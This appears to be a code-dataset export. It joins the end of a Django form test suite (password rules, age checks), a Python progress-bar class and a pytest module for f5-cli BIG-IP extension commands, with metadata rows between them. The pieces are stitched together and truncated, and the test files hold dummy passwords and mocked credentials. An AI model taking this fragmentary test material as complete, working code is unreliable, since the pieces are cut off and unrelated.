"email":
["Enter a valid email address."],
"gender":
["Select a valid choice. no is not one of the available "
"choices."],
"country":
["Select a valid choice. That choice is not one of the "
"available choices."],
}
)
def test_min_required_age_dob(self):
form = EditProfileForm(data={
"birth_date": datetime.date.today() - relativedelta(years=10),
})
self.assertFalse(form.is_valid())
@override_settings(
HIDE_FIELDS={"global_enable": False,
"global_fields": ["birth_date"]}
)
def test_age_and_dob_required(self):
form = EditProfileForm(data={})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"__all__": [
"Enter either birth date or age"
],
"gender": ["This field is required."],
})
def test_min_required_age(self):
form = EditProfileForm(data={
"age": constants.CONSENT_AGE-1,
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"gender": ["This field is required."],
"age": [
"We are sorry, " \
f"users under the age of {constants.CONSENT_AGE}" \
" cannot create an account."
]
})
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2018, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
form = EditProfileForm(data={
"birth_date": datetime.date(2018-constants.CONSENT_AGE, 1, 3),
})
self.assertFalse(form.is_valid())
form = EditProfileForm(data={
"birth_date": datetime.date(2018-constants.CONSENT_AGE+1, 1, 3),
})
self.assertFalse(form.is_valid())
def test_on_required_age(self):
form = EditProfileForm(data={
"age": constants.CONSENT_AGE,
"gender": "female"
})
self.assertTrue(form.is_valid())
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2018, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
form = EditProfileForm(data={
"birth_date": datetime.date(2018-constants.CONSENT_AGE, 1, 2),
"gender": "female"
})
self.assertTrue(form.is_valid())
class TestPasswordResetForm(TestCase):
maxDiff = None
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_user(
username="forgotmypassword",
birth_date=datetime.date(2000, 1, 1),
email="atleastihavethis@email.com",
email_verified=True
)
cls.user.save()
org = Organisation.objects.create(
name="uniquename",
description="some text"
)
cls.org_user = get_user_model().objects.create_user(
username="org_forgotmypassword",
birth_date=datetime.date(2000, 1, 1),
email="org_atleastihavethis@email.com",
email_verified=True,
organisation=org
)
cls.org_user.save()
def test_none_org_html_state(self):
form = SetPasswordForm(self.user)
html = form.as_div()
self.assertNotIn(
"The password must contain at least one uppercase letter, one lowercase one, a digit and special character",
html
)
def test_org_html_state(self):
form = SetPasswordForm(self.org_user)
html = form.as_div()
self.assertIn(
"The password must contain at least one uppercase letter, one lowercase one, a digit and special character",
html
)
def test_user_password_validation(self):
# Test both required
form = SetPasswordForm(self.user, data={
"new_password1": "password",
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["This field is required."],
})
# Test both must match
form = SetPasswordForm(self.user, data={
"new_password1": "password",
"new_password2": "password2"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["The two password fields don't match. Please try again."],
})
# Test min length
form = SetPasswordForm(self.user, data={
"new_password1": "123",
"new_password2": "123"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"Eeek - that password is too short! "
"Please create a password that has at least 8 characters and is a combination of letters and numbers."
]
})
def test_org_user_password_validation(self):
# Test both required
form = SetPasswordForm(self.org_user, data={
"new_password1": "password",
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["This field is required."],
})
# Test both must match
form = SetPasswordForm(self.org_user, data={
"new_password1": "password",
"new_password2": "password2"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["The two password fields don't match. Please try again."],
})
# Test min length, unique validation and contains more than numeric
form = SetPasswordForm(self.org_user, data={
"new_password1": "123",
"new_password2": "123"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"This password is too short. It must contain at least 8 characters.",
"This password is entirely numeric.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test unique validation
form = SetPasswordForm(self.org_user, data={
"new_password1": "asdasdasd",
"new_password2": "asdasdasd"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test close to username
form = SetPasswordForm(self.org_user, data={
"new_password1": "forgotmypass",
"new_password2": "forgotmypass"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"The password is too similar to the username.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test success
form = SetPasswordForm(self.org_user, data={
"new_password1": "asdasdasdA@1",
"new_password2": "asdasdasdA@1"
})
self.assertTrue(form.is_valid())
class TestPasswordChangeForm(TestCase):
maxDiff = None
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_user(
username="forgotmypassword",
birth_date=datetime.date(2000, 1, 1),
email="atleastihavethis@email.com",
email_verified=True
)
cls.user.set_password("atleast_its_not_1234")
cls.user.save()
org = Organisation.objects.create(
name="uniquename",
description="some text"
)
cls.org_user = get_user_model().objects.create_user(
username="org_forgotmypassword",
birth_date=datetime.date(2000, 1, 1),
email="org_atleastihavethis@email.com",
email_verified=True,
organisation=org
)
cls.org_user.set_password("atleast_its_not_1234")
cls.org_user.save()
def test_none_org_html_state(self):
form = PasswordChangeForm(self.user)
html = form.as_div()
self.assertIn(
"Enter your new password",
html
)
def test_org_html_state(self):
form = PasswordChangeForm(self.org_user)
html = form.as_div()
self.assertIn(
"Enter your new password",
html
)
def test_user_password_validation(self):
# Test both required
form = PasswordChangeForm(self.user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "password",
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["This field is required."],
})
# Test both must match
form = PasswordChangeForm(self.user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "password",
"new_password2": "password2"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["The two password fields don't match. Please try again."],
})
# Test min length
form = PasswordChangeForm(self.user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "123",
"new_password2": "123"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"Eeek - that password is too short! "
"Please create a password that has at least 8 characters and is a combination of letters and numbers."
]
})
def test_org_user_password_validation(self):
# Test both required
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "password",
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["This field is required."],
})
# Test both must match
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "password",
"new_password2": "password2"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": ["The two password fields don't match. Please try again."],
})
# Test min length, unique validation and contains more than numeric
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "123",
"new_password2": "123"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"This password is too short. It must contain at least 8 characters.",
"This password is entirely numeric.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test unique validation
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "asdasdasd",
"new_password2": "asdasdasd"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test close to username
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "forgotmypass",
"new_password2": "forgotmypass"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"new_password2": [
"The password is too similar to the username.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test success
form = PasswordChangeForm(self.org_user, data={
"old_password": "atleast_its_not_1234",
"new_password1": "asdasdasdA@1",
"new_password2": "asdasdasdA@1"
})
self.assertTrue(form.is_valid())
class TestRequiredDecorator(TestCase):
maxDiff = None
def test_registration(self):
form = RegistrationForm()
html = form.as_div()
for name, field in form.fields.items():
# Terms is not rendered as part of the form html method
if field.required and name != "terms":
self.assertIn("*", field.label)
self.assertIn(
field.label,
html
)
def test_edit_profile(self):
user = get_user_model().objects.create_user(
username="requiredlabeluser",
email="awesome@email.com",
password="Awesome!234",
birth_date=datetime.date(2001, 1, 1)
)
form = EditProfileForm(instance=user)
html = form.as_div()
for name, field in form.fields.items():
if field.required:
self.assertIn("*", field.label)
self.assertIn(field.label, html)
def test_user_migration(self):
form = UserDataForm()
html = form.as_div()
for name, field in form.fields.items():
if field.required:
self.assertIn("*", field.label)
self.assertIn(field.label, html)
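# Illustrative invocation (assumption, not part of the test module): these Django TestCase
# classes would typically be run through Django's test runner, e.g.
#   python manage.py test authentication_service.tests.test_forms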
| 36.300408
| 120
| 0.543402
| 4,456
| 44,468
| 5.293761
| 0.074955
| 0.022256
| 0.030777
| 0.0443
| 0.882276
| 0.873161
| 0.864344
| 0.848828
| 0.819238
| 0.794226
| 0
| 0.023851
| 0.330575
| 44,468
| 1,224
| 121
| 36.330065
| 0.768577
| 0.036453
| 0
| 0.822535
| 0
| 0
| 0.284983
| 0.010867
| 0
| 0
| 0
| 0.000817
| 0.128639
| 1
| 0.040376
| false
| 0.198122
| 0.00939
| 0
| 0.064789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
935fb354e6879be24cacfbc4b45f540a03ad4c40
| 1,809
|
py
|
Python
|
StringProgressBar/__init__.py
|
MrJacob12/StringProgressBar
|
12b7a3f5170edf007aabbd9cc985200250bdd904
|
[
"MIT"
] | 2
|
2021-09-27T05:42:38.000Z
|
2022-03-04T04:49:38.000Z
|
StringProgressBar/__init__.py
|
Sparker-99/StringProgressBar
|
12b7a3f5170edf007aabbd9cc985200250bdd904
|
[
"MIT"
] | null | null | null |
StringProgressBar/__init__.py
|
Sparker-99/StringProgressBar
|
12b7a3f5170edf007aabbd9cc985200250bdd904
|
[
"MIT"
] | 3
|
2021-09-26T13:54:23.000Z
|
2021-09-26T14:49:17.000Z
|
class progressBar():
def splitBar(total, current, size=40, line='▬', slider='🔘'):
if not isinstance(total, int):
raise ValueError('Total value is not an integer')
if not isinstance(current, int):
raise ValueError('Current value is not an integer')
if not isinstance(size, int):
raise ValueError('Size is not an integer')
if current > total:
bar = line * size
percentage = (current / total) * 100
return [bar, percentage]
else:
percentage = current / total
progress = round(size * percentage)
emptyProgress = size - progress
progressText = (line * progress)[:-1] + slider
emptyProgressText = line * emptyProgress
bar = progressText + emptyProgressText
calculated = percentage * 100
return [bar, calculated]
def filledBar(total, current, size=40, line='□', slider='■'):
if not isinstance(total, int):
raise ValueError('Total value is not an integer')
if not isinstance(current, int):
raise ValueError('Current value is not an integer')
if not isinstance(size, int):
raise ValueError('Size is not an integer')
if current > total:
bar = slider * size
percentage = (current / total) * 100
return [bar, percentage]
else:
percentage = current / total
progress = round(size * percentage)
emptyProgress = size - progress
progressText = slider * progress
emptyProgressText = line * emptyProgress
bar = progressText + emptyProgressText
calculated = percentage * 100
return [bar, calculated]
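# Illustrative usage (not part of the original module): a hedged sketch calling the two bar
# builders via the class; the printed values follow directly from the arithmetic above.
bar, pct = progressBar.splitBar(100, 50, size=40)   # 19 line chars + slider + 20 line chars
print(bar, pct)                                      # pct == 50.0
bar, pct = progressBar.filledBar(100, 25, size=20)   # 5 filled chars + 15 empty chars
print(bar, pct)                                      # pct == 25.0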
| 38.489362
| 65
| 0.569375
| 178
| 1,809
| 5.808989
| 0.207865
| 0.029014
| 0.087041
| 0.081238
| 0.905222
| 0.862669
| 0.862669
| 0.862669
| 0.862669
| 0.862669
| 0
| 0.014358
| 0.345495
| 1,809
| 46
| 66
| 39.326087
| 0.855574
| 0
| 0
| 0.829268
| 0
| 0
| 0.092869
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04878
| false
| 0
| 0
| 0
| 0.170732
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9360ed038c41558f1c1146a2e665c9fec63eeeba
| 35,284
|
py
|
Python
|
tests/unittests/commands/test_cmd_bigip.py
|
f5devcentral/f5-cli
|
22a5c6902e3f78a969a86116a73fcad817f220be
|
[
"Apache-2.0"
] | 13
|
2020-03-06T22:35:47.000Z
|
2021-06-28T23:08:46.000Z
|
tests/unittests/commands/test_cmd_bigip.py
|
f5devcentral/f5-cli
|
22a5c6902e3f78a969a86116a73fcad817f220be
|
[
"Apache-2.0"
] | 19
|
2020-03-11T15:14:06.000Z
|
2022-01-26T23:56:56.000Z
|
tests/unittests/commands/test_cmd_bigip.py
|
f5devcentral/f5-cli
|
22a5c6902e3f78a969a86116a73fcad817f220be
|
[
"Apache-2.0"
] | 1
|
2020-03-24T13:29:30.000Z
|
2020-03-24T13:29:30.000Z
|
""" Test BIG-IP command """
import json
from f5sdk.bigip import ManagementClient
from f5cli.config import AuthConfigurationClient
from f5cli.commands.cmd_bigip import cli
from ...global_test_imports import MagicMock, call, PropertyMock, pytest, CliRunner
MOCK_CONFIG_CLIENT_READ_AUTH_RETURN_VALUE = {
'host': '1.2.3.4',
'port': '1234',
'type': 'BIGIP',
'user': 'test_user',
'password': 'test_password'
}
MOCK_IS_INSTALLED_RETURN_VALUE = {
'installed': True,
'installed_version': '1.10.0',
'latest_version': '1.10.0'
}
# pylint: disable=too-many-public-methods
class TestCommandBigIp(object):
""" Test Class: command bigip """
@classmethod
def setup_class(cls):
""" Setup func """
cls.runner = CliRunner()
@classmethod
def teardown_class(cls):
""" Teardown func """
@staticmethod
@pytest.fixture
def do_extension_client_fixture(mocker):
"""Test fixture """
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = MOCK_IS_INSTALLED_RETURN_VALUE
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
return mock_extension_client
@staticmethod
@pytest.fixture
def as3_extension_client_fixture(mocker):
"""Test fixture """
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.AS3Client")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
return mock_extension_client
@staticmethod
@pytest.fixture
def cf_extension_client_fixture(mocker):
"""Test fixture """
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.CFClient")
mock = MagicMock()
mock.is_installed.return_value = MOCK_IS_INSTALLED_RETURN_VALUE
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
return mock_extension_client
@staticmethod
@pytest.fixture
def config_client_read_auth_fixture(mocker):
""" PyTest fixture mocking AuthConfigurationClient's read_auth method """
mock_config_client_read_auth = mocker.patch.object(
AuthConfigurationClient, "read_auth")
mock_config_client_read_auth.return_value = MOCK_CONFIG_CLIENT_READ_AUTH_RETURN_VALUE
@staticmethod
@pytest.fixture
def config_client_fixture(mocker):
""" PyTest fixture returning mocked AuthConfigurationClient """
mock_config_client = mocker.patch.object(AuthConfigurationClient, "__init__")
mock_config_client.return_value = None
return mock_config_client
@staticmethod
@pytest.fixture
def mgmt_client_fixture(mocker):
""" PyTest fixture returning mocked BigIP Management Client """
mock_management_client = mocker.patch.object(ManagementClient, '__init__')
mock_management_client.return_value = None
return mock_management_client
# pylint: disable=unused-argument
def test_cmd_package_verify_existing_extension_component(self,
mocker,
mgmt_client_fixture,
config_client_read_auth_fixture):
""" Command package verify an existing extension component
Given
- BIG-IP is up
- 'do' extension component is installed
When
- User attempts to verify status of the install 'do' extension component
Then
- Installed version information 'do' extension component is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = MOCK_IS_INSTALLED_RETURN_VALUE
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'verify', '--version', '1.10.0'])
assert result.output == json.dumps(
MOCK_IS_INSTALLED_RETURN_VALUE,
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_verify_nonexist_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package verify a non-existing package
Given
- BIG-IP is up
- 'do' component is not installed
When
- User attempts to verify status of the install 'do' component
Then
- Installed version information 'do' extension component is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock_is_installed_return_value = {
'installed': False,
'installed_version': '',
'latest_version': '1.10.0'
}
mock = MagicMock()
mock.is_installed.return_value = mock_is_installed_return_value
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'verify', '--version', '1.10.0'])
assert result.output == json.dumps(
mock_is_installed_return_value, indent=4, sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_install_existing_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package install an existing package
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to install 'do' component
Then
- Already installed 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.10.0',
'latest_version': '1.10.0'
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'install', '--version', '1.10.0'])
assert result.output == json.dumps(
{"message": "Extension component package 'do' version '1.10.0' is already installed"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_install_non_existing_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package install a non-existing package
Given
- BIG-IP is up
- 'do' component is not installed
When
- User attempts to install 'do' component
Then
- Successfully installed 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': False,
'installed_version': '',
'latest_version': '1.10.0'
}
mock.install.return_value = {'version': '1.10.0'}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'install', '--version', '1.10.0'])
assert result.output == json.dumps(
{"message": "Extension component package 'do' successfully installed version '1.10.0'"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_uninstall_existing_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package uninstall an existing package
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to uninstall 'do' component
Then
- Uninstalled 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.10.0',
}
mock.uninstall.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock
)
result = self.runner.invoke(
cli, ['extension', 'do', 'uninstall', '--version', '1.10.0', '--auto-approve'])
assert result.output == json.dumps(
{
"message": "Extension component package 'do' successfully uninstalled"
},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_uninstall_non_existing_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package uninstall a non-existing package
Given
- BIG-IP is up
- 'do' component is not installed
When
- User attempts to uninstall 'do' component
Then
- Already uninstalled 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': False,
'installed_version': ''
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'uninstall', '--version', '1.10.0', '--auto-approve'])
assert result.output == json.dumps(
{"message": "Extension component package 'do' is already uninstalled"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_install_optional_package_url_https(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
as3_extension_client_fixture):
""" Command package install optional package-url https
Given
- BIG-IP is up
- 'as3' component is not installed
When
- User attempts to install package 'as3' --package-url with https:// specify
Then
- Successfully installed 'as3' component message is logged
"""
mock_package = MagicMock()
mock_package.is_installed.return_value = {
'installed': False
}
mock_response = {
"message": "Extension component package 'as3' successfully installed version '3.17.1'"
}
remote_rpm = 'https://myhost/f5-appsvcs-3.17.1-1.noarch.rpm'
mock_package.install(package_url=remote_rpm)
mock_package.install.return_value = {'version': '3.17.1'}
mock_extension_client = as3_extension_client_fixture
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock_package)
result = self.runner.invoke(cli, ['extension', 'as3', 'install', '--package-url',
remote_rpm])
assert result.output == json.dumps(mock_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_install_optional_package_url_file(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
as3_extension_client_fixture):
""" Command package install optional package-url file
Given
- BIG-IP is up
- 'as3' component is not installed
When
- User attempts to install package 'as3' --package-url with file:// specify
Then
- Successfully installed 'as3' component message is logged
"""
mock_package = MagicMock()
mock_package.is_installed.return_value = {
'installed': False
}
mock_response = {
"message": "Extension component package 'as3' successfully installed version '3.17.1'"
}
local_rpm = 'file:///downloads/f5-appsvcs-3.17.1-1.noarch.rpm'
mock_package.install(package_url=local_rpm)
mock_package.install.return_value = {'version': '3.17.1'}
mock_extension_client = as3_extension_client_fixture
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock_package)
result = self.runner.invoke(cli, ['extension', 'as3', 'install', '--package-url',
local_rpm])
assert result.output == json.dumps(mock_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_upgrade_existing_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package upgrade to a latest version
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to upgrade 'do' component
Then
- Upgraded 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.8.0',
'latest_version': '1.10.0'
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': False,
'installed_version': ''
}
mock.uninstall.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.8.0',
'latest_version': '1.10.0'
}
mock.install.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'upgrade'])
assert result.output == json.dumps(
{"message": "Successfully upgraded extension component package 'do' to "
"version '1.10.0'"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_upgrade_existing_extension_component_ver(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package upgrade to a specific version
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to upgrade 'do' component --version 1.9.0
Then
- Upgraded 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.8.0',
'latest_version': '1.10.0'
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': False,
'installed_version': ''
}
mock.uninstall.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.9.0',
'latest_version': '1.10.0'
}
mock.install.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'upgrade', '--version', '1.9.0'])
assert result.exit_code == 0, result.exception
assert result.output == json.dumps(
{"message": "Successfully upgraded extension component package 'do' to "
"version '1.9.0'"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_upgrade_installed_vers_equals_latest_vers(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package upgrade to a version already latest
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to upgrade to a version already installed
Then
- Upgraded 'do' component message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': True,
'installed_version': '1.10.0',
'latest_version': '1.10.0'
}
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock
)
result = self.runner.invoke(
cli, ['extension', 'do', 'upgrade'])
assert result.output == json.dumps(
{"message": "Extension component package 'do' version '1.10.0' "
"is already installed"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_package_upgrade_uninstalled_extension_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package upgrade uninstalled extension component
Given
- BIG-IP is up
- 'do' component is not installed
When
- User attempts to upgrade 'do' component
Then
- Already uninstalled 'do', re-run install message is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
mock = MagicMock()
mock.is_installed.return_value = {
'installed': False,
'installed_version': '',
'latest_version': '1.10.0'
}
type(mock_extension_client.return_value).package = PropertyMock(return_value=mock)
result = self.runner.invoke(
cli, ['extension', 'do', 'upgrade'])
assert result.output == json.dumps(
{"message": "Extension component package 'do' is uninstalled, re-run install command"},
indent=4,
sort_keys=True
) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_show_installed_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
do_extension_client_fixture):
""" Command service show an already installed component
Given
- BIG-IP is up
- 'do' component is installed
When
- User attempts to show the status of 'do' component
Then
- Current status message of 'do' component is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient")
show_response = {
'foo': 'bar'
}
mock_service = MagicMock()
mock_service.show.return_value = show_response
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(
cli, ['extension', 'do', 'show', '--version', '1.3.0'])
assert result.output == json.dumps(show_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_show_non_installed_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command service show status of a non-installed component
Given
- BIG-IP is up
- 'do' component is not installed
When
- User attempts to show the status of 'do' component
Then
- 'do' component is installed
- 'do' component is available
- Current status message of 'do' component is logged
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient"
)
is_installed_response = {
'installed': False
}
show_response = {
'foo': 'bar'
}
mock_package = MagicMock()
mock_package.is_installed.return_value = is_installed_response
mock_package.install.return_value = None
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock_package)
mock_service = MagicMock()
mock_service.show.return_value = show_response
mock_service.is_available.return_value = None
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
result = self.runner.invoke(
cli,
['extension', 'do', 'show', '--version', '1.3.0']
)
assert result.exit_code == 0, result.exception
assert result.output == json.dumps(show_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_list_versions_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture):
""" Command package list-versions
Given
- BIG-IP is up
When
- User attempts to list available package versions of 'do'
Then
- all available packages will be listed
"""
mock_extension_client = mocker.patch(
"f5sdk.bigip.extension.DOClient"
)
list_response = [
'foo',
'bar'
]
mock_package = MagicMock()
mock_package.list_versions.return_value = list_response
type(mock_extension_client.return_value).package = PropertyMock(
return_value=mock_package)
result = self.runner.invoke(
cli,
['extension', 'do', 'list-versions']
)
assert result.output == json.dumps(list_response, indent=4, sort_keys=True) + '\n'
# pylint: disable=unused-argument
def test_cmd_service_create_declaration_non_installed_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
as3_extension_client_fixture):
""" Command service create declaration of an installed component
Given
- BIG-IP is up
- 'as3' component is not installed
When
- User attempts to create a 'as3' declaration
Then
- result status of create action is logged
"""
mock_package = MagicMock()
mock_package.is_installed.return_value = {
'installed': False
}
mock_service = MagicMock()
create_response = {
'foo': 'bar'
}
mock_service.create.return_value = create_response
mock_extension_client = as3_extension_client_fixture
type(mock_extension_client.return_value).service = PropertyMock(
return_value=mock_service)
mock_utils_core_convert = mocker.patch(
"f5cli.utils.core.convert_to_absolute")
mock_utils_core_convert.return_value = "fake location"
result = self.runner.invoke(cli, ['extension', 'as3', 'create',
'--declaration', './test/fake_declaration.json'])
assert result.output == json.dumps(create_response, indent=4, sort_keys=True) + '\n'
mock_utils_core_convert.assert_has_calls(
[call('./test/fake_declaration.json')])
# pylint: disable=unused-argument
def test_cmd_service_create_declaration_installed_component(self,
mocker,
config_client_read_auth_fixture,
mgmt_client_fixture,
do_extension_client_fixture):
